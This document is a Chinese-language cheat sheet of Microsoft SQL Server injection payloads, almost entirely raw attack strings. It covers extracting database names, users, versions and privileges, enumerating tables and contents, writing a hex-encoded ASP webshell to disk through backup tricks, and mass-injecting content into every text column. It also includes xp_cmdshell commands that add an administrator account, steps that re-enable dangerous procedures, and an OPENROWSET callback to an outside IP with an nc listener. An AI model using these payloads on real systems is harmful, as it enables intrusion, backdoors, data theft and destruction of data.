■获取数据库名
and db_name()=0
and db_name(0)=0
and db_name(__i__)=0
and quotename(db_name(__i__))=0
■获取用户名
and user=0
■获取版本信息
and @@version=0
■获取服务器名
and @@servername=0
■获取服务名
and @@servicename=0
■获取系统用户名
and system_user=0
■一次性获取所有基本信息
AnD
(dB_NaMe(0)+cHaR(124)+uSeR+cHaR(124)+@@vErSiOn+cHaR(124)+@@sErVeRnAmE+cHaR(124)+@@sErViCeNaMe+cHaR(124)+sYsTeM_UsEr)=0
■一次性探测权限
AnD
(cAsT(iS_srvrOlEmEmBeR(0x730079007300610064006d0069006e00)aS
vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x64006200630072006500610074006f007200)aS
vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x620075006c006b00610064006d0069006e00)aS
vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x6400690073006b00610064006d0069006e00)aS
vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x730065007200760065007200610064006d0069006e00)aS
vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x7000750062006c0069006300) aS
vArChAr)+cHaR(94)+cAsT(iS_mEmBeR
(0x640062005f006f0077006e0065007200) aS
vArChAr)+cHaR(94)+cAsT(iS_mEmBeR
(0x640062005f006200610063006b00750070006f00700065007200610074006f007200)
aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR
(0x640062005f006400610074006100770072006900740065007200) aS
vArChAr))=0
■获取数据库的数目
AnD (sElEcT cAsT(cOuNt(1) aS
nvArChAr(100))+cHaR(9) FrOm mAsTeR..sYsDaTaBaSeS)=0
■获取数据库文件名
and (select top 1 filename from (select top
__i__ filename from master..sysdatabases order by filename) t order
by filename desc)=0
■同时获取数据库名和数据库文件名
AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(nAmE aS
nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(filenAmE aS
nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__
nAmE,filenAmE FrOm mAsTeR..sYsDaTaBaSeS oRdEr bY nAmE) t oRdEr bY
nAmE dEsC)=0
■获取数据库的表的数目
and (select cast(count(1) as
varchar)+char(9) from
..sysobjects where
xtype=0x75)=0
■获取数据库的表
and (select top 1 name from (select top
__i__ name from ..sysobjects
where xtype=0X75 order by name) t order by name desc)=0
and (select top 1 quotename(name) from
.dbo.sysobjects where
xtype=char(85) AND name not in (select top __i__ name from
.dbo.sysobjects where
xtype=char(85)))=0
■获取表的字段的数目
and (select cast(count(1) as
varchar)+char(9) from
..syscolumns where
id=object_id(''))=0
■获取数据库表的字段
and (select top 1 name from (select top
__i__ name,id from ..syscolumns
where id=object_id('') order by
name) t order by name desc)=0
and (select
col_name(object_id(''),__i__))=0
■获取满足条件的表的记录数
AnD (sElEcT cAsT(cOuNt(1) aS
nvArChAr(100))+cHaR(9) FrOm
..)=0
■获取数据库的内容
AnD (sElEcT ToP 1
rtrim(iSnUlL(cAsT( aS
nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(
aS
nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(
aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__
,,
FrOm
..
oRdEr bY ) t oRdEr bY
dEsC)=0
■基于日志差异备份
--1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt
Create Table ttt (a image) Backup Log TestDB to disk =
'' With
Init--
--2. 插入数据
;Insert Into ttt
Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
--3. 备份并获得文件,删除临时表
;Backup Log To Disk =
'';Drop
Table ttt Alter Database TestDB Set Recovery SIMPLE--
■基于数据库差异备份
1. 进行差异备份准备工作
;Declare @a Sysname;Set @a=db_name();Declare @file
VarChar(400);Set
@file=;Drop
Table ttt Create Table ttt(c Image) Backup Database @a To
Disk=@file--
2. 将数据写入到数据库
;Insert Into ttt
Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
3. 备份数据库并作最后的清理工作
;Declare @b SysName;Set @b=db_name();Declare @file1
VarChar(400);Set
@file1=;Backup
Database @b To Disk=@file1 With Differential,Format;Drop Table
ttt;--
■数据库插马(插指定数据库的指定表的满足条件的记录)
;update
..
set
=+''
where --
■数据库批量插马(插所有可插入的字段和记录,危险!!请谨慎操作!!)
;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR
cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b
wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR
b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm
tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe
['+@t+'] sEt
['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(
aS vArChAr(200))') fEtCh
next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe
tAbLe_cursoR;--
;DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor
CURSOR FOR SELECT a.name,b.name FROM sysobjects a,s yscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR
b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM
Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE
['+@T+'] SET
['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor--
■执行命令行(无结果返回)
;exec master..xp_cmdshell 'net user name password /add
& net localgroup administrators name /add'--
■恢复存储过程 xp_cmdshell
;Exec Master..sp_dropextendedproc
0x780070005F0063006D0064007300680065006C006C00;Exec
Master..sp_addextendedproc
0x780070005F0063006D0064007300680065006C006C00,0x78706C6F6737302E646C6C--
■SQLServer 2005 开启和关闭 xp_cmdshell
;EXEC master..sp_configure 'show advanced
options',1;RECONFIGURE;EXEC master..sp_configure
'xp_cmdshell',1;RECONFIGURE;
关闭 xp_cmdshell
;EXEC master..sp_configure 'show advanced
options',1;RECONFIGURE;EXEC master..sp_configure
'xp_cmdshell',0;RECONFIGURE;
■SQLServer 2005 开启和关闭 OpenDataSource/OpenRowSet
开启:
;EXEC master..sp_configure 'show advanced
options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc
Distributed Queries',1;RECONFIGURE;
关闭:
;EXEC master..sp_configure 'show advanced
options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc
Distributed Queries',0;RECONFIGURE;
■SQLServer 2005 日志差异备份
alter database [testdb] set recovery full
declare @d nvarchar(4000) set @d=0x640062006200610063006B00
backup database __dbname__ to disk=@d with init--
drop table [itpro]--
create table [itpro]([a] image)--
declare @d nvarchar(4000) set @d=0x640062006200610063006B00
backup log __dbname__ to disk=@d with init--
insert into [itpro]([a]) values(__varchar(木马内容))--
declare @d nvarchar(4000) set @d=__nvarchar(文件名) backup log
__dbname__ to disk=@d with init--
drop table [itpro] declare @d nvarchar(4000) set
@d=0x640062006200610063006B00 backup log __dbname__ to disk=@d with
init--
■查看数据库服务器IP
NC监听80端口:nc -vvlp 80
(反连看IP,自己机器并不一定要有装MSSQL的),在注射点上注射如下语句:
;insert into
OPENROWSET('SQLOLEDB','uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=58.53.58.32,80;',
'select * from dest_table') select * from src_table;--
因为我们只要看IP,所以其他的参数就无所谓了。而端口设置成80,是为了预防一些机器只让访问外部80。